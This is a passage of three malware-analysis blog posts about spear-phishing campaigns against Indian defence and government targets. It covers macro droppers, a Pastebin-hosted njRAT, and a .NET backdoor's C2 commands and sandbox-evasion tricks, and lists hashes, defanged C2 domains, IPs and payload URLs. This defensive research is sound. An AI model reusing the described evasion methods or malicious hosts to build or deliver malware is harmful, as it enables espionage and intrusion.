Even though attackers tried to make it look like the spear phishing email was sent by an email id associated with
Hidrofersa but inspecting the email headers revealed some interesting information.
The X-AuthUser in the header below revealed the identity of the sender. The sender is associated with a company
named
Combined Freight (PVT) Limited
(combinedfreight[.]com)
9/13
Combined Freight (PVT) Limited is freight forwarding company which is into ocean & air freight business
headquartered in Karachi, Pakistan (as per their website). This company has 4 other offices in Pakistan (Lahore,
Islamabad, Sialkot, Faisalabad). Below is the screen shot taken from their website.
10/13
Based on the information mentioned above, It looks like the spoofed email was sent by a user associated with a
Pakistan based company Combined Freight (PVT) Limited.
Indicators Of Compromise
In this case the cyber espionage group targeted Mazagon Dock Shipbuilders Limited (MDL) but it is possible that
other defense equipment manufacturers could also be targeted as part of this attack campaign. The indicators
associated with this attack are provided so that the organizations (Government, Public, Private organizations,
Defense and Defense equipment manufacturers) can use these indicators to detect, remediate and investigate this
attack campaign. Below are the indicators
Dropped Malware Sample:
08f2fc9cb30b22c765a0ca9433b35a46
Samples hosted on the compromised University site:
6c94b4c7610d278bf8dfc3dbb5ece9ce
a81eaed8ae25f5fa5b107cbc6fe6e446
9a708879fd0a03d4089ee343c9254e5b
069629248742f9d762f66568ba7bcec8
6455a43366f4da09429738076e7f289c
34d5a3d6ae3c1836e0577b6f94ee0294
6eee8a69bc40b104931abdd68509df85
01c85dd7d8202765331a5cc818948213
42664aa65c473832a5c0df62c8b38d68
18e7480894149194f2cd17ee40d0ad7b
575b4b449a12f2bed583f2a59485f776
eae013aec7f45661223ea115ee38cc95
33b9c2c2cbecd4a4844057491b02379e
bf499821c935e67e0fb606915453a964
42e411bcb48240fb44c48327b81d8c57
efaa8d161bbe6342204ffa5b1b22ed0c
4623d0e188dc225de8dcd494c7802f7f
3cba51905a78bd221a2433ee180111c0
a6e6a131887c0cdbf67569e1320840d8
08f2fc9cb30b22c765a0ca9433b35a46
44b7aaea854a1a3a0addb521eb7c5eb9
11/13
22730ae47acc178c0445c486d16d7ae9
5b5edc209737b6faa3a6d6711fba1648
bf5e7ea70c2dab12100b91d77ca76ff2
34c44c9138a2d4c31391c2cc0b044c02
Network Indicators Associated with C2:
tripleshop[.]id
103[.]229[.]74[.]32
C2 Communication Patterns:
hxxp://tripleshop[.]id/userfiles/media/pixum/okilo/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/agogo/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/alpha/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/ariri/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/bobby/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/chisom/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/crack/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/declan/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/elber/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/figure/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/henry/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/ike/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/jizzy/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/kcc/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/kc/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/matte/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/nels/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/notes/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/polish/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/turbo/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/whesilo/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/yboss/post.php
hxxp://tripleshop[.]id/userfiles/media/pixum/yg/post.php
Conclusion
Attackers in this case made every attempt to launch a clever attack campaign by spoofing legitimate email ids and
using an email theme relevant to the targets. The following factors in this cyber attack suggests the possible
involvement of Pakistan state sponsored cyber espionage group to steal the intellectual property such as
design/blueprints and manufacturing data related to submarines and warships.
Victims/targets chosen (Submarine & Warship manufacturer for Indian Navy)
Use of Email theme related to the targets
Timing of the spear phishing emails sent to the victims (The day before the Republic Day)
Email header information indicating the possible Pakistan connection
Use of malware that is capable of spying and uploading screen shots
Use of TTP
s (tactics, techniques & procedures) similar to the previous campaign
The following factors reveal the attackers intention to remain stealthy and the attempt to evade sandbox analysis,
manual analysis and security monitoring at both the desktop and network levels.
12/13
Use of obfuscated malicious macro code
Use of junk code (to divert the manual analysis)
Use of compromised university site to host malicious code (to bypass security monitoring)
Use of Silent UAC (user account control) bypass technique
Use of Malware that sleeps for long time without generating any network activity (to evade sandbox analysis)
Use of hosting provider to host C2 infrastructure
Cyber espionage groups will continue targeting defense sectors and defense equipment manufacturers for the
following reasons:
To steal defense related information and proprietary product information that can provide their sponsoring
governments with military and economic advantages.
To identify vulnerabilities in the defense technologies to gain advantage over adversary
s military capabilities
To reduce their research and development costs and produce and sell similar products at lower prices
References
http://researchcenter.paloaltonetworks.com/2015/06/keybase-keylogger-malware-family-exposed/
http://www.brycampbell.co.uk/new-blog/2015/7/14/keybase-malware
http://researchcenter.paloaltonetworks.com/2016/02/keybase-threat-grows-despite-public-takedown-a-picture-isworth-a-thousand-words/
https://www.fireeye.com/current-threats/reports-by-industry/aerospace-threat-intelligence.html
Follow us on Twitter: @monnappa22 @cysinfo22
13/13
Uri Terror attack & Kashmir Protest Themed spear phishing
emails targeting Indian Embassies and Indian Ministry of
external affairs
cysinfo.com/uri-terror-attack-spear-phishing-emails-targeting-indian-embassies-and-indian-mea/
1/19/2017
In my previous blog I posted details of a cyber attack targeting Indian government organizations. This blog post
describes another attack campaign where attackers used the Uri terror attack and Kashmir protest themed spear
phishing emails to target officials in the Indian Embassies and Indian Ministry of External Affairs (MEA). In order to
infect the victims, the attackers distributed spear-phishing emails containing malicious word document which
dropped a malware capable of spying on infected systems. The email purported to have been sent from legitimate
email ids. The attackers spoofed the email ids associated with Indian Ministry of Home Affairs to send out email to
the victims. Attackers also used the name of the top-ranking official associated with Minister of Home affairs in the
signature of the email, this is to make it look like the email was sent by a high-ranking Government official
associated with Ministry of Home Affairs (MHA).
Overview of the Malicious Emails
In the The first wave of attack, The attackers spoofed an email id that is associated with Indian Ministry of Home
Affairs (MHA) and an email was sent on September 20th, 2016 (just 2 days after the Uri terror attack) to an email id
associated with the Indian Embassy in Japan. The email was made to look like as if an investigation report related
to Uri terror attack was shared by the MHA official. This email contained a malicious word document (Uri Terror
Report.doc) as shown in the below screen shot
On Sept 20th,2016 similar Uri Terror report themed email was also sent to an email id connected with Indian
embassy in Thailand. This email was later forwarded on Oct 24th,2016 from a spoofed email id which is associated
with Thailand Indian embassy to various email recipients connected to the Indian Ministry of External Affairs as
shown in the below screen shot. This email also contained the same malicious word document (Uri Terror
Report.doc)
1/14
In the second wave of attack slightly different theme was used, this time attackers used the Jammnu & Kashmir
protest theme to target the victims. In this case Attackers again spoofed an email id associated with Indian Ministry
of Home Affairs and the mail was sent on September 1,2016 to an email id associated Thailand Indian embassy, this
email was later forwarded on Oct 24th,2016 from a spoofed email of Thailand Indian embassy to various email
recipients connected to the Indian Ministry of External Affairs (MEA). This time the email was made to look like an
investigation report related to Jammu & Kashmir protest was shared by the Ministry of Home Affairs Official and the
forwarded email was made to look like the report was forwarded by an Ambassador in Thailand Indian embassy to
the MEA officials. This email contained a different malicious word document (mha-report.doc) as shown in the below
screen shot.
From the emails (and the attachments) it looks like the goal of the attackers was to infect and take control of the
systems and also to spy on the actions of the Indian Government post the Jammu & Kashmir protest and Uri Terror
attack.
Analysis of Malicious Word Documents
2/14
When the victim opens the attached word document it prompts the user to enable macro content and both the
documents (Uri Terror Report.doc and mha-report.doc) displayed the same content and contained a Show
Document button as shown below
In case of both the documents (Uri Terror Report.doc and mha-report.doc) the malicious macro code was heavily
obfuscated(used obscure variable/function names to make analysis harder) and did not contain any auto execute
functions . Malicious activity is trigged only on user interaction, attackers normally use this technique to bypass
sandbox/automated analysis. Reverse engineering both the word documents (Uri Terror Report.doc & mhareport.doc) exhibited similar behaviour except the minor difference mentioned below.
In case of mha-report.doc the malicious activity triggered only when the show document button was clicked, when
this event occurs the macro code calls a subroutine CommandButton1_Click() which in turn calls a malicious
obfuscated function (Bulbaknopka()) as shown in the below screen shot.
In case of Uri Terror Report.doc the malicious activity triggered when the document was either closed or when the
show document button was clicked, when any of these event occurs a malicious obfuscated function
(chugnnarabashkoim()) gets called as shown below.
3/14
The malicious macro code first decodes a string which contains a reference to the pastebin url. The macro then
decodes a PowerShell script which downloads base64 encoded content from the pastebin url.
Below screen shot shows the network traffic generated as a result of macro code executing the PowerShell script.
Below screen shot shows the malicious base64 encoded content hosted on that pastebin link.
4/14
The base64 encoded content downloaded from the Pastebin link is then decoded to an executable and dropped on
the system. The technique of hosting malicious code in legitimate sites like Pastebin has advantages and it is highly
unlikely to trigger any suspicion in security monitoring and also can bypass reputation based devices. Below screen
shot shows the file (officeupdate.exe) decoded and dropped on the system.
The dropped file was determined as modified version of njRAT trojan. The dropped file ( officeupdate.exe) is then
executed by the macro code using the PowerShell script.
njRAT is a Remote Access Tool (RAT) used mostly by the actor groups in the middle east. Once infected njRAT
communicates to the attacker and allows the attacker to log keystrokes, upload/download files, access victims web
camera, audio recording, steal credentials, view victims desktop, open reverse shell etc. The njRAT attacker control
5/14
panel and the features in the attacker control panel is shown in the below screen shot.
Analysis of the Dropped Executable (officeupdate.exe)
The dropped file was analyzed in an isolated environment (without actually allowing it to connect to the c2 server).
This section contains the behavioral analysis of the dropped executable
Once the dropped file (officeupdate.exe) is executed the malware drops additional files ( googleupdate.exe, malib.dll
and msccvs.dll) into the %AllUsersProfile%\Google directory and then executes the dropped googleupdate.exe
The malware then communicates with the C2 server (khanji[.]ddns[.]net) on port 5555
6/14
C2 Communication Pattern
Upon execution malware makes a connection to the c2 server on port 5555 and sends the system & operating
system information along with some base64 encoded strings to the attacker as shown below.
Below is the description of the strings passed in the C2 communication
WIN-T9UN4HIIHEC -> is the hostname of the infected system
Administrator -> is the username
16-12-04 -> is the infection date
No -> Indicates that the system has no camera
The below screen shot shows the base64 decoded strings associated with the C2 communication
Below is the description of the decoded strings
7/14
1302_E63C5C8F -> is the botID_volume-serial-number
Process Hacker [WIN-T9UN4HIIHEC\Administrator]+ -> Reports open window, In my case I was using a tool
called Process Hacker, The information on the open window lets the attacker know what tools are running
on the system or if analysis tools are used to inspect the malware.
C2 Domain Information
This section contains the details of the C2 domain (khanji[.]ddns[.]net). Attackers used the DynamicDNS to host the
C2 server, this allows the attacker to quickly change the IP address in real time if the malware C2 server
infrastructure is unavailable. The C2 domain was associated with multiple IP addresses in past as shown below
During the timeline of this cyber attack most of these IP addresses were located in Pakistan and few IP addresses
used the hosting provider infrastructure as shown in the screen shot below
8/14
Below screenshot shows the timeline when these IP addresses were active.
The C2 domain (khanji[.]ddns[.]net) was also found to be associated with multiple malware samples in the past,
Some of these malware samples made connection to pastebin urls upon execution, which is similar to the behavior
mentioned previously.
9/14
Threat Intelligence
Based on the base64 encoded content posted in the Pastebin, userid associated with the Pastebin post was
determined. The same user posted multiple similar posts most of them containing similar base64 encoded content
(probably used by the malwares in other campaigns to decode and drop malware executable), these posts were
made between July 21st, 2016 to September 30, 2016. Below screen shot shows the posts made by the user, the
hits column in the below screen shot gives an idea of number of times the links were visited (probably by the
malicious macro code), this can give rough idea of the number of users who are probably infected as a result of
opening the malicious document.
10/14
Below screen shot shows one of the post containing base64 encoded data made by the user on Sept 26th,2016
Doing a Google search for the Pastebin userid landed me on a YouTube video posted by an individual
demonstrating his modified version of njRAT control panel/builder kit. The Pastebin userid matched with the Email
ID mentioned by this individual in the YouTube video description section as shown below.
This individual also used a specific keyword in his Skype id, Twitter id, and the YouTube username. This same
keyword was also found in the njRAT C2 communication used in this attack as shown below.
11/14
After inspecting the njRAT builder kit it was determined that this individual customized the existing njRAT builder kit
to bypass security products. The product information in the builder kit matched with this individual
s YouTube
username and the YouTube channel. The njRAT used in this cyber attack was built from this builder kit.
Based on this information it can be concluded that espionage actors used this individual
s modified version of njRAT
in this cyber attack.
Even though this individual
s email id matched with the Pastebin id where base64 encoded malicious code was
found, it is hard to say if this individual was or was not involved in this cyber attack. It could be possible that the
espionage actors used his public identity as a diversion to mislead and to hide the real identity of the attackers or it
is also possible that this individual was hired to carry out the attack.
Indicators Of Compromise
The indicators are provided below, these indicators can be used by the organizations (Government, Public and
Private organizations) to detect and investigate this attack campaign.
Dropped Malware Samples:
14b9d54f07f3facf1240c5ba89aa2410 (googleupdate.exe)
2b0bd7e43c1f98f9db804011a54c11d6 (malib.dll)
feec4b571756e8c015c884cb5441166b (msccvs.dll)
84d9d0524e14d9ab5f88bbce6d2d2582 (officeupdate.exe)
Network Indicators Associated with C2:
12/14
khanji[.]ddns[.]net
139[.]190[.]6[.]180
39[.]40[.]141[.]25
175[.]110[.]165[.]110
39[.]40[.]44[.]245
39[.]40[.]67[.]219
119[.]160[.]68[.]178
175[.]107[.]13[.]215
39[.]47[.]125[.]110
175[.]107[.]5[.]247
175[.]107[.]6[.]174
182[.]191[.]90[.]91
175[.]107[.]7[.]50
182[.]191[.]90[.]92
175[.]107[.]7[.]69
39[.]47[.]84[.]127
192[.]169[.]136[.]121
155[.]254[.]225[.]24
203[.]31[.]216[.]214
45[.]42[.]243[.]20
Pastebin URL
s Hosting Malicious Payload:
hxxp://pastebin.com/raw/5j4hc8gT
hxxp://pastebin.com/raw/6bwniBtB
Related Malware Samples associated with C2 (khanji[.]ddns[.]net):
028caf3b1f5174ae092ecf435c1fccc2
7732d5349a0cfa1c3e4bcfa0c06949e4
9909f8558209449348a817f297429a48
63698ddbdff5be7d5a7ba7f31d0d592c
7c4e60685203b229a41ae65eba1a0e10
e2112439121f8ba9164668f54ca1c6af
784b6e13f195236304e1c172dcdab51f
b0f0350a5c2480d8419d14ec3445b765
9a51db9889d4fd6d02bdb35bd13fb07e
8199667bad5559ee8f04fd6b1a587a75
7ad6aaa107a7616a3dbe8e3babf5d310
Conclusion
Attackers in this case made every attempt to launch a clever attack campaign by spoofing legitimate email ids and
using an email theme relevant to the targets. The following factors in this cyber attack suggests the possible
involvement of Pakistan state sponsored cyber espionage group to mainly spy on India
s actions related to these
Geo-political events (Uri terror attack and Jammu & Kashmir protests).
Victims/targets chosen (Indian Embassy and Indian MEA officals)
Use of Email theme related to the Geo-political events that is of interest to the targets
Timing of the spear phishing emails sent to the victims
Location of the C2 infrastructure
Use of malware that is capable of spying on infected systems
13/14
The following factors show the level of sophistication and reveals the attackers intention to remain stealthy and to
gain long-term access by evading anti-virus, sandbox and security monitoring at both the desktop and network
levels.
Use of obfuscated malicious macro code
Use of macro code that triggers only on user intervention (to bypass sandbox analysis)
Use of legitimate site (Pastebin) to host malicious code (to bypass security monitoring)
Use of customized njRAT (capable of evading anti-virus)
Use of Dynamic DNS to host C2 infrastructure
I would like to thank Brian Rogalski who after reading my previous blog post shared a malicious document which he
thought was similar to the document mentioned in my previous blog. This malicious document shared by Brian
triggered this investigation and helped me in identifying the related Emails and related documents associated with
this cyber attack.
References
https://www.zscaler.com/blogs/research/njrat-h-worm-variant-infections-continue-rise
http://threatgeek.typepad.com/files/fta-1009
njrat-uncovered-1.pdf
https://www.eff.org/files/2013/12/28/quantum_of_surveillance4d.pdf
https://www.symantec.com/connect/blogs/simple-njrat-fuels-nascent-middle-east-cybercrime-scene
Follow us on Twitter: @monnappa22 @cysinfo22
14/14
Cyber Attack Impersonating Identity of Indian Think Tank to
Target Central Bureau of Investigation (CBI) and Possibly
Indian Army Officials
cysinfo.com /cyber-attack-targeting-cbi-and-possibly-indian-army-officials/
5/11/2017
In my previous blog posts I posted details of cyber attacks targeting Indian Ministry of External Affairs and
Indian Navy
s Warship and Submarine Manufacturer. This blog post describes another attack campaign where
attackers impersonated identity of Indian think tank IDSA (Institute for Defence Studies and Analyses) and sent out
spear-phishing emails to target officials of the Central Bureau of Investigation (CBI) and possibly the officials of
Indian Army.
IDSA (Institute for Defence Studies and Analyses) is an Indian think tank for advanced research in international
relations, especially strategic and security issues, and also trains civilian and military officers of the Government of
India and deals with objective research and policy relating to all aspects of defense and National security.
The Central Bureau of Investigation (CBI) is the domestic intelligence and security service of India and serves as the
India
s premier investigative and Interpol agency operating under the jurisdiction of the Government of India.
In order to infect the victims, the attackers distributed spear-phishing emails containing malicious excel file which
when opened dropped a malware capable of downloading additional components and spying on infected systems.
To distribute the malicious excel file, the attackers registered a domain which impersonated the identity of most
influential Indian think tank IDSA (Institute for Defence Studies and Analyses) and used the email id from the
impersonating domain to send out the spear-phishing emails to the victims.
Overview of the Malicious Emails
In the first wave of attack, The attackers sent out spear-phishing emails containing malicious excel file (Case Detail
of Suspected abuser.xls) to an unit of Central Bureau of Investigation (CBI) on February 21st, 2017 and the email
was sent from an email id associated with an impersonating domain idsadesk[.]in. To lure the victims to open the
malicious attachment the email subject relevant to the victims were chosen and to avoid suspicion the email was
made to look like it was sent by a person associated with IDSA asking to take action against a pending case as
shown in the screen shot below.
1/33
In the second wave of attack, a spear-phishing email containing a different malicious excel file (Contact List of
attendees.xls) was sent to an email id on the same day February 21st, 2017. The email was made to look like a
person associated with IDSA is asking to confirm the phone number of an attendee in the attendee list. When the
victim opens the attached excel file it drops the malware and displays a decoy excel sheet containing the list of
names, which seems be the names of senior army officers. Even though the identity of the recipient email could not
be fully verified as this email id is nowhere available on the internet but based on the format of the recipient email id
and from the list of attendees that is displayed to the victim in the decoy excel file, the recipient email could be
possibly be associated with either the Indian Army or a Government entity. This suggests that attackers had prior
knowledge of the recipient email id through other means.
In both the cases when the victims opens the attached malicious excel file the same malware sample was dropped
and executed on the victim
s system. From the emails (and the attachments) it looks like the goal of the attackers
was to infect and take control of the systems and to spy on the victims.
Anti-Analysis Techniques in the Malicious Excel File
When the victim opens the attached excel file it prompts the user to enable macro content as shown in the below
2/33
screen shot.
To prevent viewing of the macro code and to make manual analysis harder attackers password protected the macro
content as show below.
Even though the macro is password protected, It is possible to extract macro code using analysis tools like oletools.
In this case oletools was used to extract the macro content but it turns out that the oletools was able to extract only
partial macro content but it failed to extract the malicious content present inside a Textbox within the Userform.
Below screen shot shows the macro content extracted by the oletools.
3/33
This extracted macro content was copied to new excel workbook and the environment was setup to debug the
macro code. Debugging the macro code failed because the macro code accesses the textbox content within the
UserForm (which oletools failed to extract). The technique of storing the malicious content inside the TextBox within
the UserForm allowed the attackers to bypass analysis tools. Below screen shot shows the macro code accessing
the content from the TextBox and the error triggered by the code due to the absence of the TextBox content.
To bypass the anti-analysis technique and to extract the content stored in the TextBox within the UserForm the
password protection was bypassed which allowed to extract the content stored within the UserForm. Below screen
shot shows the TextBox content stored within the UserForm.
4/33
At this point all the components (macro code and the UserForm content) required for analysis was extracted and an
environment similar to the original excel file was created to debug the malicious macro. Below screen shots show
the new excel file containing extracted macro code and the UserForm content.
Analysis of Malicious Excel File
When the victim opens the excel file and enables the macro content, The malicious macro code within the excel file
is executed. The macro code first generates a random filename as shown in the below screen shot.
5/33
It then reads the executable content stored in the TextBox within the UserForm and then writes the executable
content to the randomly generate filename in the %AppData% directory. The executable is written in .NET
framework
The content stored in the TexBox within the UserForm is an executable content in the decimal format. Below screen
shot shows converted data from decimal to text. In this case the attackers used the TextBox within the UserForm to
store the malicious executable content.
6/33
The dropped file in the %AppData% directory is then executed as shown in the below screen shot.
7/33
Once the dropped file is executed it copies itself into %AppData%\SQLite directory as SQLite.exe and executes as
shown below.
As a result of executing SQLite.exe it makes a HTTP connection to the C2 server (qhavcloud[.]com). The C2
communication shown below contains a hard coded user-agent and the double slash (//) in the GET request this can
be used to create network based signatures.
8/33
Reverse Engineering the Dropped File (SQLite.exe)
The dynamic/sandbox analysis did not reveal much about the functionality of the malware, in order to understand the
capabilities of the malware, the sample had be reverse engineered. The malware sample was reverse engineered in
an isolated environment (without actually allowing it to connect to the c2 server).This section contains reverse
engineering details of this malware and its various features.
a) Malware Validates C2 Connection
Malware checks if the executable is running as SQLite.exe from %AppData%\SQLite directory, if not it copies itself
as SQLite.exe to %AppData%\SQLite directory as shown below.
It then launches the executable (SQLite.exe) with the command line arguments as shown in the below screen shots.
Malware performs multiple checks to make sure that it is connecting to the correct C2 server before doing anything
malicious. first its pings the C2 domain qhavcloud[.]com. Below screen shots show the ping to the C2 server.
9/33
If the ping succeeds then it determines if C2 server is alive by sending an HTTP request, it then reads the content
from the C2 server and looks for a specific string
Connection!
. If it does not find the string
Connection!
it assumes
that C2 is not alive or it is connecting to the wrong C2 server. This technique allows the attackers to validate if they
are connecting to the correct C2 server and also this technique does not reveal any malicious behavior in
dynamic/sandbox analysis until the correct response is given to the malware. Below screen shots show the code that
is performing the C2 connection and the validation.
If the ping does not succeed or if the C2 response does not contain the string
Connection!
then the malware gets
10/33
the list of backup C2 servers to connect by downloading a text file from the Google drive link. This technique of
storing a text file containing the list of backup C2 servers on the legitimate site has advantages and it is highly
unlikely to trigger any suspicion in security monitoring and also can bypass reputation based devices. Below screen
shots show the code that downloads the text file and text file (info.txt) saved on the disk.
During the time of analysis the text file downloaded from the Google drive link was populated with two private IP
addresses, it looks like the attackers deliberately populated the IP addresses with two private IP addresses to
prevent the researchers from determining actual IP/domain names of the backup C2 servers. Below screen shot
shows the IP addresses in the text file.
Once the text file is downloaded the malware reads each and every IP address from the text file and performs the
same C2 validation check (ping and checks for the string
Connection!
from the C2 response). Below screen shot
shows the HTTP connection made to those IP addresses.
11/33
b) Malware Sends System Information
Based on the analysis it was determined that the malware looks for a string
Connection!
in the C2 response, so the
analysis environment was configured to respond with a string
Connection!
whenever the malware made a C2
connection. Below screen shot shows the C2 communication made by the malware and the expected response.
Once the malware validates the C2 connection then the malware creates an XML file (SQLite.xml) inside which it
stores the user name and the password to communicate with the C2 server.
Malware generates the user name to communicate with the C2 by concatenating a) the machine name, b) a random
number between 1000 to 9999 and c) the product version of the file. Below screen shot shows the code that
generates the user name
Malware generates the password to communicate with the C2 by building an array of 16 random bytes, these
random bytes are then encoded using base64 encoding algorithm and malware then replaces the characters
and
12/33
with
and
respectively from the encoded data. The attackers use the technique of replacing the standard
characters with custom characters to makes it difficult to decode the string (containing the characters
and
using standard base64 algorithm. Below screen shot shows the code that generates the password.
Once the user name and password is generated, malware then creates an XML file (SQLITE.xml) and populates the
XML file with the generated user name and password. Below screen shot shows the code that creates the XML file
Below screen shot shows the XML file populated with the user name and the password which is used by the
malware to communicate with the C2 server.
The malware then collects system information like the computer name, operating system caption, IP address of the
infected system, product version of the executable file and sends it to the C2 server along with the generated user
13/33
name and password using a POST request to postdata.php. Below screen shots show the code that collects the
system information and the data that is sent to the attacker.
c) Malware Sends Process Information
Malware then enumerates the list of all the processes running on the system and sends it to the C2 server along
with the user name and password using a POST request to JobProcesses.php as shown in the below screen shots.
This allows the attackers to know which programs are running on the system or if any analysis tools are used to
inspect the malware.
14/33
Malware Functionalities
Apart from sending the system information and process information to the C2 server, the malware also has the
capability to perform various other tasks by taking command from the C2. This section focuses on different
functionalities of the malware
a) Download & Execute Functionality 1
Malware triggers the download functionality by connecting to the C2 server and making a request to either
Jobwork1.php or Jobwork2.php, if the C2 response satisfies the condition then it downloads & executes the file.
After understanding the logic (logic is mentioned below) & to satisfy the condition the environment was configured to
give proper response whenever the malware made a request to Jobwork1.php or Jobwork2.php. Below screen shot
shows the response given to the malware.
15/33
Malware then reads the response successfully as shown in the below screen shot.
from the C2 response it extracts two things a) URL to download an executable file and b) the command string that
will trigger the download functionality
From the C2 response the URL is extracted starting from offset 14 (i.e 15th character) and it determines the length
of the string (URL) to extract by finding the start offset of the string
clientpermission
once it finds it, its offset value
is subtracted with 17.
The command string to trigger the download functionality is extracted from the C2 response using the logic shown
below. Below screen shot shows the logic used to extract the URL and the command strings, in the below screen
shot the extracted command string is stored in the variable ServerTask1Permission.
16/33
Once the URL and command string is extracted, the malware compares the command string with the string
Pending
, only if the command string matches with string
Pending
the download functionality is triggered.
When all the above mentioned conditions are satisfied the malware downloads the executable from the URL
extracted from the C2 response. Below screen shot shows the URL extracted from the C2 response.
Note: In the below screen shot the URL (hxxp://c2xy.com/a.exe) is not the actual URL used by the malware for
downloading the file, this is a test URL used to determine the functionality, so this URL should not used as an
indicator.
Below screen shot shows the network traffic of malware trying to download the executable file from the extracted
URL.
17/33
The downloaded executable is saved in the %AppData%\SQLite directory as shown in the below screen shot.
The downloaded file is then executed by the malware as shown in the below screen shot.
Once the downloaded file is executed the malware reports that the download & execute was successful by making a
POST request to JobDone.php as shown in the below screen shots
18/33
This functionality allows the attacker to change their hosting site (from where the malware will be downloaded), this
can be achieved by changing the C2 response containing different URL.
b) Download & Execute Functionality 2
Malware also supports second type of download functionality,instead of extracting the URL from the C2 response
and downloading the executable, it gets executable content from the networks stream from a hard coded IP address
and then writes it to the disk and executes it.
This functionality is triggered by making a request to either JobTcp1.php or JobTcp2.php, if the C2 response
satisfies the condition then it gets the executable content from a hard coded IP address. After understanding the
logic & to satisfy the condition the environment was configured to give proper response when the malware made a
request to JobTcp1.php or JobTcp2.php. Below screen shot shows the response given to the malware.
19/33
Malware then reads the c2 response and from the C2 response it extracts two things a) filename and b) the
command string that will trigger the download functionality.
From the C2 response the filename is extracted starting from offset 14 (i.e 15th character) and it determines the
length of the string to extract by finding the start offset of the string
clientpermission
once it finds it, its offset value
is subtracted with 17. The command string to trigger the download functionality is extracted from the C2 response
using the logic shown below. Below screen shot shows the logic used to extract the filename and the command
string, in the below screen shot the extracted command string is stored in the variable ServerTask1Permission.
Once the filename and command string is extracted, the malware compares the command string with the string
Pending
, if the command string matches with string
Pending
then the extracted filename (in this case the
extracted filename is
testfile
) from the C2 response is concatenated with
.exe
as shown below.
20/33
It then connects to the hard coded IP 91[.]205[.]173[.]3 on port 6134, and it sends the concatenated filename
(testfile.exe) as shown below.
The IP address after verifying the filename then returns the executable content which malware reads directly from
the network stream and writes to the disk in the %Appdata%\SQLIte directory as shown below.
21/33
The dropped file is then executed as shown in the below screen shot.
c) Update Functionality
Malware has the capability to update itself this is done by making a request to updateproductdownload.php, if C2
response satisfies the condition then it downloads the updated executable from an URL. After understanding the
logic & to satisfy the condition the environment was configured to give proper response. Below screen shot shows
the response given to the malware when it makes a request to updateproductdownload.php
22/33
Malware then reads the c2 response and from the C2 response it extracts two things a) URL to download the
updated executable and b) the command string that will trigger the update functionality
From the C2 response the URL is extracted by finding the start offset of the string
updatetpermission
once it finds
it, its offset value is subtracted with 17 to get the URL from where the updated executable will be downloaded. To get
the command string malware extracts the string starting from the offset of the string
updatetpermission
+ 19 and
extracts a 7 character length string which it uses as the command string.
Below screen shot shows the logic used to extract the URL and the command string, in the below screen shot the
extracted command string is stored in the variable ServerUpdatePermissionInstruction.
Once the URL and command string is extracted, the malware compares the command string with the string
Pending
, only if the command string matches with string
Pending
then the malware downloads the updated
executable from the extracted URL. Below screen shot shows the code which performs the check and and extracted
Note: In the below screen shot the URL (hxxp://c2xyup.com/update.exe) is not the actual URL used by the malware
for updating, this is a test URL used to determine the functionality, so this URL should not used as an indicator.
23/33
The malware then downloads the updated executable and drops it in the %Appdata%\SQLite directory as shown in
the below screen shots.
Once it downloads the updated executable then the malware creates a value in the Run registry key for persistence,
before that it deletes the old entry and adds the new entry so that next time when the system starts the updated
executable will run. Below screen shots show the registry entry added by the malware.
24/33
The functionality allows the attacker to update their malware components.
d) Delete/Uninstall Functionality
Malware also has the capability to delete itself this is done by making a request to Uninstaller.php. Below screen
shot shows the code that makes this request.
25/33
The environment was configured to give a proper response to trigger the uninstall/delete functionality. Below screen
shot shows the network traffic making the POST request to Uninstaller.php and the returned response.
Malware then checks if the C2 response contains the string
delete
. Below screen shots show the code that reads
the C2 response and the code that performs the check.
26/33
If the C2 response contains the string
delete
, then the malware first deletes the entry from the Run registry that the
malware uses for persistence as shown below.
After deleting the registry entry, malware deletes all the files from the %Appdata%\SQLite directory by creating a
batch script. The batch script pings a hard coded IP address 180[.]92[.]154[.]176 10 times (this is a technique used
to sleep for 10 seconds) before deleting all the files.
27/33
Once the all the files are deleted the malware kills its own process as shown in the below screen shot.
This functionality allows the attackers to delete their footprints on the system.
C2 Information
This section contains the details of the C2 domain qhavcloud[.]com. This C2 domain was associated with two IP
addresses. Both of these IP addresses is associated with hosting provider in Germany as shown in the screen shots
below.
28/33
The hard coded IP address 91[.]205[.]173[.]3 in the binary from where the malware downloads additional
components is also associated with the same hosting provider in Germany as shown below.
The C2 domain qhavcloud[.]com was also found to be associated with multiple malware samples in the past. Below
screen shot shows the md5 hashes of the samples that is associated with the C2 domain.
29/33
The C2 domain qhavcloud[.]com and the hard coded IP address 91[.]205[.]173[.]3 were also found to be associated
with another attack campaign which targeted the senior army officers. This suggests that the same espionage group
involved in this attack also targeted the senior army officers using a different email theme.
Threat Intelligence
Investigating the domain idsadesk[.]in (which was used to send the email by impersonating the identity of IDSA)
shows that it was created on 20th Feb 2017 (which is the day before the spear-phishing email was sent to the
victims). Most of the registrant information seems to be fake and another notable detail that is of interest is the
registrant country and country code (+92) of registrant phone number is associated with Pakistan.
30/33
Further investigation shows that the same registrant email id was also used to register another similar domain
(idsagroup[.]in) which also impersonates the identity of IDSA. This impersonating domain was also registered on the
same day 20th February 2017 and this domain could also be used by the attackers to send out spear-phishing
emails to different targets.
While investigating the malware
s uninstall/delete functionality it was determined that malware creates a batch script
to delete all its files but before deleting all the files it pings 10 times to an hard coded IP address 180[.]92[.]154[.]176
as shown below.
31/33
Investigating this hard coded IP address shows that it is located in Pakistan. The Pakistan connection in the whois
information and the hard coded IP address is interesting because the previous two attacks against Indian Ministry of
External Affairs and Indian Navy
s submarine manufacturer also had a Pakistan connection. Based on just the whois
